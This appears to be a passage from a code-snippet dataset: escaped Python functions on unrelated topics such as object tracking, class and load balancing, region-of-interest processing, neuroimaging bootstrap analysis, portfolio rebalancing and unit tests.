matched_new_per_old[idx]\n if instances[newidx].color is None:\n instances[newidx].color = inst.color\n if instances[newidx].objID is None:\n instances[newidx].objID = inst.objID\n continue\n # If an old instance does not match any new instances,\n # keep it for the next frame in case it is just missed by the detector\n inst.ttl -= 1\n if inst.ttl > 0:\n extra_instances.append(inst)\n\n # Assign random color to newly-detected instances:\n for inst in instances:\n if inst.color is None:\n inst.color = random_color(rgb=True, maximum=1)\n if inst.objID is None:\n #Assign random 32-bit hex key\n inst.objID = ''.join(random.choices(string.ascii_letters + string.digits, k=32))\n self._old_instances = instances[:] + extra_instances\n return [d.objID for d in instances]", "def calc(self):\n self.proc_blocks = [cluster.cells for cluster in self.clusters]\n self.cell_loads = [sum([len(cell) for cell in self.proc_blocks])]\n self.particle_loads = [cluster.np for cluster in self.clusters]\n self.imbalance = 
LoadBalancer.get_load_imbalance(self.particle_loads)", "def balance_dataset_weighting(instances):\n factors = get_balancing_weight_factors(instances)\n new_instances = [ (features, classification, w * factors[classification]) \n for features, classification, w in instances ]\n return new_instances", "def two_nb(X, y, S, dataset):\n\n\tpreds = pd.DataFrame()\n\troc = pd.DataFrame()\n\n\tcv = KFold(n_splits = 10, shuffle = False)\n\n\tmean_tpr = 0.0\n\tmean_fpr = np.linspace(0, 1, 100)\n\n\tgnb_pos = GaussianNB()\n\tgnb_neg = GaussianNB()\n\n\tfor train, test in cv.split(X):\n\t\tX_train, X_test = X.iloc[train], X.iloc[test]\n\t\ty_train, y_test = y[train], y[test]\n\n\t\t# For every train/test split, we further partition each dataset\n\t\t# on the value of the sensitive attribute\n\t\tX_train_pos, y_train_pos, X_train_neg, y_train_neg = split_on_sensitive_attribute(X_train, y_train, S)\n\t\tX_test_pos, y_test_pos, X_test_neg, y_test_neg = split_on_sensitive_attribute(X_test, y_test, S)\n\n\t\t# Train a separate NB classifier on each training set\n\t\tgnb_pos.fit(X_train_pos, y_train_pos)\n\t\tgnb_neg.fit(X_train_neg, y_train_neg)\n\n\t\t# And predict on the test set using the corresponding model,\n\t\t# then combine the predictions\n\t\tpreds_k_pos = gnb_pos.predict(X_test_pos).tolist()\n\t\tpreds_k_neg = gnb_neg.predict(X_test_neg).tolist()\n\t\tpreds_k = preds_k_pos + preds_k_neg\n\n\t\tproba_pos = pd.DataFrame(gnb_pos.predict_proba(X_test_pos))\n\t\tproba_neg = pd.DataFrame(gnb_neg.predict_proba(X_test_neg))\n\t\tproba = pd.concat([proba_pos, proba_neg])\n\n\t\ty_test_reordered = y_test_pos.tolist() + y_test_neg.tolist()\n\t\tfpr, tpr, thresholds = roc_curve(y_test_reordered, proba.iloc[:,1].values)\n\n\t\tmean_tpr += interp(mean_fpr, fpr, tpr)\n\t\tmean_tpr[0] = 0.0\n\n\t\tpreds_df = pd.DataFrame({\n\t\t\t'neg': proba.iloc[:, 0],\n\t\t\t'pos': proba.iloc[:, 1],\n\t\t\t'pred': preds_k,\n\t\t\t'class': y_test_reordered})\n\t\tpreds = preds_df.append(preds)\n\n\tmean_tpr /= 10\n\troc = pd.DataFrame({'tpr': mean_tpr, 'fpr': mean_fpr})\n\t\n\troc.to_csv(\"output/\" + dataset + \"2nb_roc_gnb.csv\", index = False)\n\n\tX_out = X.copy()\n\tnew_idx = range(0, len(X.index))\n\tX_out['idx'] = new_idx\n\tX_out = X_out.set_index(['idx'], drop = True)\n\n\tX_out = X_out.join(preds)\n\tX_out.to_csv(\"output/\" + dataset + \"2nb_predictions_gnb.csv\", index = False)\n\n\t#preds.to_csv(, index = False)\n\n\tmean_tpr[-1] = 1.0\n\tauc_score = auc(mean_fpr, mean_tpr)\n\tprint(\"AUC: \" + str(auc_score))\n\n\tclassifier = [\"2nb\"]\n\tauc_score = [auc_score]\n\tscores = pd.DataFrame({'classifier': classifier, 'auc': auc_score})\n\tscores.to_csv(\"output/\" + dataset + \"2nb_auc.csv\", index = False)\n\n\treturn(preds['pred'])", "def finalize(self):\n self.total_priors = np.sum(list(self.priors.values()))\n self.total_blocks = np.sum(list(self.nblocks.values()))\n self.total_fitness = np.sum(list(self.fitness.values()))\n self.blocks = BedTool.from_dataframe(self.df)", "def take_attendance():\n\t\tcount = 0\n\t\tfor person in Simulation.community:\n\t\t\tif Simulation.community[person].went_to_bar():\n\t\t\t\tcount += 1\n\t\tprint(count)\n\t\tStrategy.evalScore(count)\n\t\tSimulation.eval_randoms(count)\n\t\tSimulation.add_to_memory(count)", "def getBalances (self):\n\n return [self.nodes[i].getbalance () for i in range (2)]", "def bilateralize(ds):\n ds_ROIs = ds.copy('deep')\n ds_ROIs.sa['bilat_ROIs'] = [label.split(' ')[-1] for label in ds_ROIs.sa.all_ROIs]\n mv.h5save(results_dir + 'ds_ROIs.hdf5', 
ds_ROIs)\n print('Combined lateralized ROIs for the provided dataset and saved the dataset.')\n return ds_ROIs", "def returnCompleteBalances(self):\n pass", "def balance_training_set(self, train_patient_ids):\n\n print('Balancing training set:')\n train_patient_ids_0 = [id for id in train_patient_ids if self.train_patients[id]['label'] == 0]\n train_patient_ids_1 = [id for id in train_patient_ids if self.train_patients[id]['label'] == 1]\n print('number of train patients with label \\'0\\':', len(train_patient_ids_0))\n print('number of train patients with label \\'1\\':', len(train_patient_ids_1))\n print('generating duplicates...')\n\n size = max(len(train_patient_ids_0), len(train_patient_ids_1))\n\n train_patient_ids_1_dup = []\n for i in range(size):\n idx_orig = i % len(train_patient_ids_1)\n train_patient_ids_1_dup.append(train_patient_ids_1[idx_orig])\n\n print('number of train patients with label \\'1\\' after duplication:', len(train_patient_ids_1_dup))\n\n train_patient_ids = train_patient_ids_0 + train_patient_ids_1_dup\n\n print('number of train patients after duplication:', len(train_patient_ids))\n print()\n\n random.shuffle(train_patient_ids)\n\n return train_patient_ids", "def test_roi_averaging(self):\n filename = get_test_data_path() + 'sgacc_mask.nii.gz'\n regions = self.dataset.masker.mask(filename, in_global_mask=True)\n avg_vox = reduce.average_within_regions(self.dataset, regions)\n n_studies = self.dataset.image_table.data.shape[1]\n self.assertEqual(n_studies, avg_vox.shape[1])\n self.assertGreater(avg_vox.sum(), 0.05)", "def storeROI(self):\n\n if self.ou_iom is None:\n \"Please load a file first please!!!!\"\n return\n\n # get the maximum key\n max_ = 0\n\n for event, rois in self.user_rois.iteritems():\n if int(event) > max_: max_ = event\n print event, max_\n \n max_+=1\n\n for event in xrange(max_):\n\n if not event in self.captured_rse_map.keys():\n continue\n\n if len(self.labeltools.stored_labels)>0:\n label_array = self.ou_iom.get_data(larcv.kProductPixel2D,self.output_prod)\n\n # event == TTree entry in the image file so I place that in the event number here.\n\n # STORE ROIs\n \n # If this event doesn't have an ROI, save a blank and continue\n if event not in self.user_rois.keys():\n if event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n else:\n self.ou_iom.set_id(1,0,event)\n\n elif len(self.user_rois[event]) == 0:\n # User accidentally hit capture ROIs when no ROI drawn, save a blank and continue\n if event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n else:\n self.ou_iom.set_id(1,0,event)\n\n # It's a fine ROI\n # if event has a stored run, subrun, event. 
put it in here\n elif event in self.user_rois_src_rse and self.save_roi_RSE.isChecked():\n rse = self.user_rois_src_rse[event]\n print \"storing ROIs for \",rse\n self.ou_iom.set_id( rse[0], rse[1], rse[2] )\n # no RSE, put a 1 in the subrun to indicate one exists\n elif event not in self.user_rois_src_rse or not self.save_roi_RSE.isChecked():\n self.ou_iom.set_id(1,1,event)\n\n # There is ROI so lets append the larcv converted ROIs and put them into the ROOT file\n if event in self.user_rois_larcv and len(self.user_rois_larcv[event])>0:\n roiarray = self.ou_iom.get_data(larcv.kProductROI,self.output_prod)\n for larcv_roi in self.user_rois_larcv[event]:\n roiarray.Append(larcv_roi)\n\n # There are vertices, too\n if event in self.user_vertices_larcv and len(self.user_vertices_larcv[event])>0:\n vertex_array = self.ou_iom.get_data(larcv.kProductPixel2D,'vertex_%s' % self.output_prod)\n for larcv_vertex2d in self.user_vertices_larcv[event]:\n if larcv_vertex2d != (None,None,None):\n print \"storing \",larcv_vertex2d\n for p,vert in enumerate( larcv_vertex2d ):\n vertex_array.Append( p, vert )\n\n # Are there labeling images?\n if event in self.labeltools.stored_labels:\n print \"storing labels for event=\",event,\n pixelclusters = self.labelimg2pixelcluster( self.labeltools.stored_labels[event] )\n for p,pixelcluster in enumerate( pixelclusters ):\n print \" plane=\",p,\":\",pixelcluster.size(),\" \",\n label_array.Append( p, pixelcluster )\n elif event not in self.labeltools.stored_labels and len(self.labeltools.stored_labels)>0:\n print \"inserting empty pixelclusters\"\n # make empty pixelclusters\n for p in xrange(0,3):\n pc = larcv.Pixel2DCluster()\n label_array.Append( p, pc )\n \n # Save them to the tree\n out_rse = self.captured_rse_map[event]\n print 'Saving RSE =',out_rse\n self.ou_iom.set_id(out_rse[0],out_rse[1],out_rse[2])\n self.ou_iom.save_entry()\n\n # Put it on the disk\n self.ou_iom.finalize()", "def test_ipam_rirs_delete(self):\n pass", "def test_dbscan_user_dataset(self):\n sp_file = os.path.join(\"tests\", \"data\", \"geolife\", \"geolife_staypoints.csv\")\n sp = ti.read_staypoints_csv(sp_file, tz=\"utc\", index_col=\"id\", crs=\"epsg:4326\")\n # take the first row and duplicate once\n sp = sp.head(1)\n sp = pd.concat([sp, sp], ignore_index=True)\n # assign a different user_id to the second row\n sp.iloc[1, 4] = 1\n\n # duplicate for a certain number\n sp = pd.concat([sp] * 6, ignore_index=True)\n _, locs_ds = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=1, distance_metric=\"haversine\", agg_level=\"dataset\"\n )\n _, locs_us = sp.as_staypoints.generate_locations(\n method=\"dbscan\", epsilon=10, num_samples=1, distance_metric=\"haversine\", agg_level=\"user\"\n )\n loc_dataset_num = len(locs_ds.index.unique())\n loc_user_num = len(locs_us.index.unique())\n assert loc_dataset_num == 1\n assert loc_user_num == 2", "def test_pandas_occupancy_compare(self):\n data = load_occupancy(return_dataset=True)\n X, y = data.to_pandas()\n\n _, _, y_train, y_test = tts(X, y, test_size=0.4, random_state=2242)\n\n # Create and fit the visualizer\n oz = ClassBalance()\n assert oz.fit(y_train, y_test) is oz\n\n # oz.finalize()\n self.assert_images_similar(oz, tol=0.5) # w/o tol fails with RMS 0.433", "def get_image_balance(self, image_array, respawn_filter):\n balance_array = []\n apply_respawn_filter = hasattr(self, 'respawnFilter') and respawn_filter\n\n for row_number, each_row in enumerate(image_array):\n for pixel_number, each_pixel in 
enumerate(each_row):\n if apply_respawn_filter:\n if self.respawnFilter[\"respawn-filter\"][row_number][pixel_number] == 0:\n continue\n avg_num = reduce(lambda x, y: int(x) + int(y), each_pixel[:3]) / 3\n balance_array.append(avg_num)\n\n balance = reduce(lambda x, y: x + y, balance_array) / len(balance_array)\n return balance", "def test_CreateROI1(self):\r\n\r\n self.delayDisplay(\"Starting the test\")\r\n #\r\n # first, get some data\r\n #\r\n import urllib\r\n downloads = (\r\n ('http://slicer.kitware.com/midas3/download?items=5767', 'FA.nrrd', slicer.util.loadVolume),\r\n )\r\n\r\n for url,name,loader in downloads:\r\n filePath = slicer.app.temporaryPath + '/' + name\r\n if not os.path.exists(filePath) or os.stat(filePath).st_size == 0:\r\n logging.info('Requesting download %s from %s...\\n' % (name, url))\r\n urllib.urlretrieve(url, filePath)\r\n if loader:\r\n logging.info('Loading %s...' % (name,))\r\n loader(filePath)\r\n self.delayDisplay('Finished with download and loading')\r\n\r\n volumeNode = slicer.util.getNode(pattern=\"FA\")\r\n logic = CreateROILogic()\r\n self.assertIsNotNone( logic.hasImageData(volumeNode) )\r\n self.delayDisplay('Test passed!')", "def cluster_bal_iter(self):\n # moving\n for j,cluster in enumerate(self.clusters):\n cluster.move()\n self.clusters_allocate_cells()\n for j,cluster in enumerate(self.clusters):\n cluster.calc()\n #print j, '\\t', cluster.center, '\\t', cluster.np, '\\t', cluster.size\n \n # resizing\n for j,cluster in enumerate(self.clusters):\n cluster.resize()\n self.clusters_allocate_cells()\n for j,cluster in enumerate(self.clusters):\n cluster.calc()\n #print j, '\\t', cluster.center, '\\t', cluster.np, '\\t', cluster.size\n \n self.calc()", "def main(dataset_name, disease_label):\n # ----------------------------------------------------------------------------\n n_bootstrap = 1000\n\n model_name = 'supervised_aae'\n\n participants_path = PROJECT_ROOT / 'data' / dataset_name / 'participants.tsv'\n freesurfer_path = PROJECT_ROOT / 'data' / dataset_name / 'freesurferData.csv'\n\n hc_label = 1\n\n # ----------------------------------------------------------------------------\n bootstrap_dir = PROJECT_ROOT / 'outputs' / 'bootstrap_analysis'\n model_dir = bootstrap_dir / model_name\n ids_path = PROJECT_ROOT / 'outputs' / (dataset_name + '_homogeneous_ids.csv')\n\n # ----------------------------------------------------------------------------\n clinical_df = load_dataset(participants_path, ids_path, freesurfer_path)\n clinical_df = clinical_df.set_index('participant_id')\n\n tpr_list = []\n auc_roc_list = []\n effect_size_list = []\n\n for i_bootstrap in tqdm(range(n_bootstrap)):\n bootstrap_model_dir = model_dir / '{:03d}'.format(i_bootstrap)\n\n output_dataset_dir = bootstrap_model_dir / dataset_name\n output_dataset_dir.mkdir(exist_ok=True)\n\n analysis_dir = output_dataset_dir / '{:02d}_vs_{:02d}'.format(hc_label, disease_label)\n analysis_dir.mkdir(exist_ok=True)\n\n # ----------------------------------------------------------------------------\n normalized_df = pd.read_csv(output_dataset_dir / 'normalized.csv', index_col='participant_id')\n reconstruction_df = pd.read_csv(output_dataset_dir / 'reconstruction.csv', index_col='participant_id')\n reconstruction_error_df = pd.read_csv(output_dataset_dir / 'reconstruction_error.csv',\n index_col='participant_id')\n\n # ----------------------------------------------------------------------------\n # Compute effect size of the brain regions for the bootstrap iteration\n diff_df = 
np.abs(normalized_df - reconstruction_df)\n region_df = compute_brain_regions_deviations(diff_df, clinical_df, disease_label)\n effect_size_list.append(region_df['effect_size'].values)\n region_df.to_csv(analysis_dir / 'regions_analysis.csv', index=False)\n\n # ----------------------------------------------------------------------------\n # Compute AUC-ROC for the bootstrap iteration\n roc_auc, tpr = compute_classification_performance(reconstruction_error_df, clinical_df, disease_label)\n auc_roc_list.append(roc_auc)\n tpr_list.append(tpr)\n\n (bootstrap_dir / dataset_name).mkdir(exist_ok=True)\n comparison_dir = bootstrap_dir / dataset_name / ('{:02d}_vs_{:02d}'.format(hc_label, disease_label))\n comparison_dir.mkdir(exist_ok=True)\n\n # ----------------------------------------------------------------------------\n # Save regions effect sizes\n effect_size_df = pd.DataFrame(columns=COLUMNS_NAME, data=np.array(effect_size_list))\n effect_size_df.to_csv(comparison_dir / 'effect_size.csv')\n\n # Save AUC bootstrap values\n auc_roc_list = np.array(auc_roc_list)\n auc_roc_df = pd.DataFrame(columns=['AUC-ROC'], data=auc_roc_list)\n auc_roc_df.to_csv(comparison_dir / 'auc_rocs.csv', index=False)\n\n # ----------------------------------------------------------------------------\n # Create Figure 3 of the paper\n tpr_list = np.array(tpr_list)\n mean_tprs = tpr_list.mean(axis=0)\n tprs_upper = np.percentile(tpr_list, 97.5, axis=0)\n tprs_lower = np.percentile(tpr_list, 2.5, axis=0)\n\n plt.plot(np.linspace(0, 1, 101),\n mean_tprs,\n 'b', lw=2,\n label='ROC curve (AUC = {:0.3f} ; 95% CI [{:0.3f}, {:0.3f}])'.format(np.mean(auc_roc_list),\n np.percentile(auc_roc_list, 2.5),\n np.percentile(auc_roc_list, 97.5)))\n\n plt.fill_between(np.linspace(0, 1, 101),\n tprs_lower, tprs_upper,\n color='grey', alpha=0.2)\n\n plt.plot([0, 1], [0, 1], 'r--')\n plt.xlim([0, 1])\n plt.ylim([0, 1.05])\n plt.ylabel('True Positive Rate')\n plt.xlabel('False Positive Rate')\n plt.legend(loc='lower right')\n plt.savefig(comparison_dir / 'AUC-ROC.eps', format='eps')\n plt.close()\n plt.clf()\n\n # --------------------------------------------------------------------------------------------\n # Create figure for supplementary materials\n effect_size_df = effect_size_df.reindex(effect_size_df.mean().sort_values().index, axis=1)\n\n plt.figure(figsize=(16, 20))\n plt.hlines(range(101),\n np.percentile(effect_size_df, 2.5, axis=0),\n np.percentile(effect_size_df, 97.5, axis=0))\n\n plt.plot(effect_size_df.mean().values, range(101), 's', color='k')\n plt.axvline(0, ls='--')\n plt.yticks(np.arange(101), effect_size_df.columns)\n plt.xlabel('Effect size')\n plt.ylabel('Brain regions')\n plt.tight_layout()\n plt.savefig(comparison_dir / 'Regions.eps', format='eps')\n plt.close()\n plt.clf()\n\n # --------------------------------------------------------------------------------------------\n # Create Figure 4 of the paper\n effect_size_sig_df = effect_size_df.reindex(effect_size_df.mean().sort_values().index, axis=1)\n lower_bound = np.percentile(effect_size_sig_df, 2.5, axis=0)\n higher_bound = np.percentile(effect_size_sig_df, 97.5, axis=0)\n\n for i, column in enumerate(effect_size_sig_df.columns):\n if (lower_bound[i] < 0) & (higher_bound[i] > 0):\n effect_size_sig_df = effect_size_sig_df.drop(columns=column)\n\n n_regions = len(effect_size_sig_df.columns)\n\n plt.figure()\n plt.hlines(range(n_regions),\n np.percentile(effect_size_sig_df, 2.5, axis=0),\n np.percentile(effect_size_sig_df, 97.5, axis=0))\n\n 
plt.plot(effect_size_sig_df.mean().values, range(n_regions), 's', color='k')\n plt.axvline(0, ls='--')\n plt.yticks(np.arange(n_regions), effect_size_sig_df.columns)\n plt.xlabel('Effect size')\n plt.ylabel('Brain regions')\n plt.tight_layout()\n plt.savefig(comparison_dir / 'Significant_regions.eps', format='eps')\n plt.close()\n plt.clf()", "def set_num_rois(self,num_rois):\n for _ in range(num_rois,len(self.rois)): # delete unneeded ROIs\n self.rois.pop()\n for _ in range(len(self.rois), num_rois): # make new ROIs\n self.rois.append(ROI(1,1,4,4,num_images=self.num_images))", "def finetune_n_estimators_createData():\n acc, auc = [], []\n for i in tqdm([j*10 for j in range(1,31)],desc='Progress(n_estimators)',ncols=70,smoothing=0.5):\n X_train, X_test, y_train, y_test, X, y_binary = initializing()\n XGBCla = get_XGBmodel(n_est=i)\n XGBCla = XGBCla.fit(X_train, y_train)\n acc.append(accuracy_score(XGBCla.predict(X_test),y_test))\n auc.append(roc_auc_score(XGBCla.predict(X_test),y_test))\n np.save(\"npy-data/result_n_estimators_tuning_acc_auc_crossval_train\",acc+auc)", "def balance(self):\n return sum(self.operations.select())\n 11", "def main(self, img, roi):\n\n self.img = img\n self.roi = roi\n transimg1, odimg1 = imageprocess.calc_absimage(np.dstack([img[:, :, 1],\n img[:, :, 5],\n img[:, :, 3]]),\n norm_edge=True)\n transimg2, odimg2 = imageprocess.calc_absimage(np.dstack([img[:, :, 2],\n img[:, :, 6],\n img[:, :, 4]]),\n norm_edge=True)\n odimg1 = imageprocess.normalize_edgestrip(odimg1)\n odimg2 = imageprocess.normalize_edgestrip(odimg2)\n balance = odimg1[roi].mean() / odimg2[roi].mean()\n\n self.ax1.imshow(transimg1, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.ax2.imshow(transimg2, vmin=0, vmax=1.35, cmap=mpl.cm.gray)\n self.balance_label.setText('The balance is %s'%balance)", "def roi(self):\n return super().get_queryset().exclude(\n outcome__isnull=True\n ).all().aggregate(\n roi=Sum('profit') / Sum('size_matched')\n )['roi']", "def prepare_roidb(self):\n # for pascal_voc dataset\n roidb = self.gt_roidb()\n # data argument\n if self.cfg.if_flipped is True:\n print('append flipped images to training')\n roidb = self.append_flipped_images(roidb)\n\n sizes = [PIL.Image.open(self.image_path_at(i)).size\n for i in range(self.num_images)]\n\n for i in range(len(self.image_index)):\n roidb[i]['image'] = self.image_path_at(i)\n roidb[i]['width'] = sizes[i][0]\n roidb[i]['height'] = sizes[i][1]\n # need gt_overlaps as a dense array for argmax\n gt_overlaps = roidb[i]['gt_overlaps'].toarray()\n # max overlap with gt over classes (columns)\n max_overlaps = gt_overlaps.max(axis=1)\n # gt class that had the max overlap\n max_classes = gt_overlaps.argmax(axis=1)\n roidb[i]['max_classes'] = max_classes\n roidb[i]['max_overlaps'] = max_overlaps\n # sanity checks\n # max overlap of 0 => class should be zero (background)\n zero_inds = np.where(max_overlaps == 0)[0]\n assert all(max_classes[zero_inds] == 0)\n # max overlap > 0 => class should not be zero (must be a fg class)\n nonzero_inds = np.where(max_overlaps > 0)[0]\n assert all(max_classes[nonzero_inds] != 0)\n\n self.roi_data = ROIGenerator(roidb, self.num_classes, self.cfg)\n return self.roi_data", "def add_roi_to_dataset(dataset):\n return [(data[0], data[1], data[2], (data[1] * data[2]) / 100) for data in dataset]", "def _sample_rois(all_rois, all_scores, gt_boxes, fg_rois_per_image, rois_per_image, num_classes):\n\n # print(gt_boxes)\n # fang[-1] ok\n\n # overlaps: (rois x gt_boxes)\n overlaps = bbox_overlaps(\n all_rois[:, 1:5].data,\n 
gt_boxes[:, :4].data)\n max_overlaps, gt_assignment = overlaps.max(1)\n labels = gt_boxes[gt_assignment, [4]]\n\n # Select foreground RoIs as those with >= FG_THRESH overlap\n fg_inds = (max_overlaps >= cfg.TRAIN.FG_THRESH).nonzero().view(-1)\n # Guard against the case when an image has fewer than fg_rois_per_image\n # Select background RoIs as those within [BG_THRESH_LO, BG_THRESH_HI)\n bg_inds = ((max_overlaps < cfg.TRAIN.BG_THRESH_HI) + (max_overlaps >= cfg.TRAIN.BG_THRESH_LO) == 2).nonzero().view(-1)\n\n # Small modification to the original version where we ensure a fixed number of regions are sampled\n if fg_inds.numel() > 0 and bg_inds.numel() > 0:\n fg_rois_per_image = min(fg_rois_per_image, fg_inds.numel())\n fg_inds = fg_inds[torch.from_numpy(npr.choice(np.arange(0, fg_inds.numel()), size=int(fg_rois_per_image), replace=False)).long().cuda()]\n bg_rois_per_image = rois_per_image - fg_rois_per_image\n to_replace = bg_inds.numel() < bg_rois_per_image\n bg_inds = bg_inds[torch.from_numpy(npr.choice(np.arange(0, bg_inds.numel()), size=int(bg_rois_per_image), replace=to_replace)).long().cuda()]\n elif fg_inds.numel() > 0:\n to_replace = fg_inds.numel() < rois_per_image\n fg_inds = fg_inds[torch.from_numpy(npr.choice(np.arange(0, fg_inds.numel()), size=int(rois_per_image), replace=to_replace)).long().cuda()]\n fg_rois_per_image = rois_per_image\n elif bg_inds.numel() > 0:\n to_replace = bg_inds.numel() < rois_per_image\n bg_inds = bg_inds[torch.from_numpy(npr.choice(np.arange(0, bg_inds.numel()), size=int(rois_per_image), replace=to_replace)).long().cuda()]\n fg_rois_per_image = 0\n else:\n import pdb\n pdb.set_trace()\n\n\n # The indices that we're selecting (both fg and bg)\n keep_inds = torch.cat([fg_inds, bg_inds], 0)\n \n # Select sampled values from various arrays:\n labels = labels[keep_inds].contiguous()\n # Clamp labels for the background RoIs to 0\n labels[int(fg_rois_per_image):] = 0\n # print(int(fg_rois_per_image)) -> 16\n\n rois = all_rois[keep_inds].contiguous()\n roi_scores = all_scores[keep_inds].contiguous()\n\n\n\n bbox_target_data, front_2_1_points_targets_data, front_2_2_points_targets_data, front_center_targets_data, \\\n back_2_1_points_targets_data, back_2_2_points_targets_data, back_center_targets_data, center_targets_data\\\n = _compute_targets(rois[:, 1:5].data, gt_boxes[gt_assignment[keep_inds]][:, :4].data, labels.data,\\\n gt_boxes[gt_assignment[keep_inds]][:, 5:9].data, gt_boxes[gt_assignment[keep_inds]][:, 9:13].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 13:15].data, gt_boxes[gt_assignment[keep_inds]][:, 15:19].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 19:23].data, gt_boxes[gt_assignment[keep_inds]][:, 23:25].data, \\\n gt_boxes[gt_assignment[keep_inds]][:, 25:27].data)\n\n bbox_targets, bbox_inside_weights, front_2_1_points_targets, front_2_2_points_targets, front_center_targets, \\\n back_2_1_points_targets, back_2_2_points_targets, back_center_targets, center_targets, front_center_inside_weights \\\n = _get_bbox_regression_labels(bbox_target_data, num_classes, front_2_1_points_targets_data, front_2_2_points_targets_data, \\\n front_center_targets_data, back_2_1_points_targets_data, back_2_2_points_targets_data, back_center_targets_data, center_targets_data)\n \n \n\n return labels, rois, roi_scores, bbox_targets, bbox_inside_weights, front_2_1_points_targets, front_2_2_points_targets, front_center_targets, \\\n back_2_1_points_targets, back_2_2_points_targets, back_center_targets, center_targets, front_center_inside_weights", "def 
Balance_Data(data, dependent):\n\t#print \"Balancing data...\"\n\tpositives = data[(data[dependent]==1)]\n\tnegatives = data.drop(positives.index).sample(n=len(positives))\n\tbalanced_data = pd.concat([positives,negatives])\n\treturn balanced_data", "def process_risk_of_biases(conn, extractors, review, trial_id):\n\n # Extract and write source\n source = extractors['extract_source'](None)\n source_id = writers.write_source(conn, source)\n\n success = 0\n keyword_filters = ['published', 'for publication']\n\n conn['database'].begin()\n\n try:\n rob = extractors['extract_rob'](review, trial_id, source_id)\n\n # Write risk_of_bias, risk_of_bias_criteria and\n # risk_of_bias-risk_of_bias_criteria if review is for publication\n if any(keyword in review['file_name'].lower() for keyword in keyword_filters):\n rob_id = writers.write_rob(conn, rob)\n review_results = extractors['extract_review_results'](review['robs'])\n for result in review_results:\n rob_crt = extractors['extract_rob_criteria'](result)\n rob_crt_id = writers.write_rob_criteria(conn, rob_crt)\n\n rob_rob_crt = extractors['extract_rob_rob_criteria'](result, rob_id,\n rob_crt_id)\n writers.write_rob_rob_criteria(conn, rob_rob_crt)\n\n # Delete risk_of_bias and risk_of_bias-risk_of_bias_criteria if\n # the review is not for publication\n else:\n writers.delete_rob(conn, rob)\n except Exception:\n config.SENTRY.captureException()\n conn['database'].rollback()\n else:\n success += 1\n conn['database'].commit()\n if not success % 100:\n logger.info('Processed %s cohrane reviews from %s', success)", "def rebalance(context, data):\n logger.debug('rebalancing on: %s', algo.get_datetime())\n\n context.trend_filter = False\n\n # new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n new_portfolio = algo.pipeline_output('pipeline').dropna(subset=['overall_rank']).sort_values('momentum', ascending=False)\n\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio (before filtering) - equity: %s', equity)\n\n # print(new_portfolio)\n\n # new_portfolio = new_portfolio[new_portfolio['overall_rank'].notna() & new_portfolio['momentum'] > 40][:20]\n \n # new_portfolio = new_portfolio[(new_portfolio['momentum_decile'] > 8)][:20]\n\n new_portfolio = new_portfolio.nlargest(20, ['overall_rank', 'momentum']) #<- $600K PL in 10 years\n\n # new_portfolio = new_portfolio.nlargest(20, ['momentum', 'overall_rank']) #<- 1M PL in 10 years\n\n if logger.level is logging.DEBUG:\n for equity, row in new_portfolio.iterrows():\n logger.debug('new portfolio - (after filtering) equity: %s', equity)\n \n\n # print(len(new_portfolio.index))\n\n # volatility driven weights\n # new_portfolio['inverse_volatility'] = new_portfolio['volatility'].apply(lambda x: 1 / x)\n # inv_vola_sum = new_portfolio['inverse_volatility'].sum()\n # new_portfolio['target_weight'] = new_portfolio['inverse_volatility'].apply(lambda x: x / inv_vola_sum)\n\n # portfolio size driven weights\n # num_equities = len(new_portfolio.index)\n # new_portfolio['target_weight'] = 1 / num_equities\\\n\n # logger.info('len existing portfolio: %s', len(context.portfolio.positions))\n\n if logger.level is logging.DEBUG:\n for equity, values in context.portfolio.positions.items():\n logger.debug('context.portfolio.positions - equity: %s, amount: %s, cost_basis: %s, sold_on: %s, sold_at_price: %s', equity, values.amount, values.cost_basis, values.last_sale_date, values.last_sale_price)\n\n \n 
order_target(algo.sid('FIBBG000NTFYM5'), 0)\n logger.debug('selling all bonds')\n\n for equity in context.portfolio.positions:\n if equity is algo.sid('FIBBG000NTFYM5'): \n continue\n if equity not in set(new_portfolio.index.tolist()):\n # logger.info('selling %s', equity)\n order_target_percent(equity, 0)\n\n stock_weights = 1.0 / max(len(context.portfolio.positions), len(new_portfolio.index))\n\n logger.debug('len existing portfolio (afer ejection): %s', len(context.portfolio.positions))\n logger.debug('len new portfolio: %s', len(new_portfolio.index))\n logger.debug('stock_weights: %s', stock_weights)\n\n # print(context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5')))\n\n # spy = context.portfolio.positions.get(algo.sid('FIBBG000NTFYM5'))\n\n # if (spy is not None) and (spy.amount > 0):\n # order_target_percent(algo.sid('FIBBG000NTFYM5'), 0)\n\n for equity, row in new_portfolio.iterrows():\n if row.trend_filter is True:\n # logger.info('buying %s', equity)\n context.trend_filter = True\n order_target_percent(equity, stock_weights)\n else:\n context.trend_filter = False\n \n logger.debug('cash: %s', context.portfolio.cash)\n logger.debug('portfolio_value: %s', context.portfolio.portfolio_value)\n logger.debug('num_positions: %s', len(context.portfolio.positions))\n logger.debug('positions: %s', context.portfolio.positions)", "def balance_classes(data, labels):\n\n index_dict = {}\n\n for idx, label in enumerate(labels):\n if label not in index_dict:\n index_dict[label] = [idx]\n else:\n index_dict[label] += [idx]\n\n index_list = list(index_dict.values())\n\n min_balanced_number = min([len(l) for l in index_list])\n\n index_to_take_list = np.concatenate([\n np.random.choice(l, min_balanced_number, replace=False)\n for l in index_list\n ])\n\n np.random.shuffle(index_to_take_list)\n\n return data[index_to_take_list], labels[index_to_take_list]", "def data_balancing(path):\r\n \r\n distribution_list = data_distribution(path)\r\n \r\n balancing_factor = []\r\n for i in range(len(distribution_list)):\r\n #print(i,distribution_list[i])\r\n #multiplier = max(distribution_list) / distribution_list[i] - 1\r\n multiplier = (np.round(5000 / distribution_list[i],0))\r\n multiplier = int(np.round(multiplier/4,0))\r\n balancing_factor.append(multiplier)\r\n #print(\"sddada\",max(distribution_list) / distribution_list[i])\r\n return balancing_factor", "def load_binary_imbalanced(classes=(1,7), 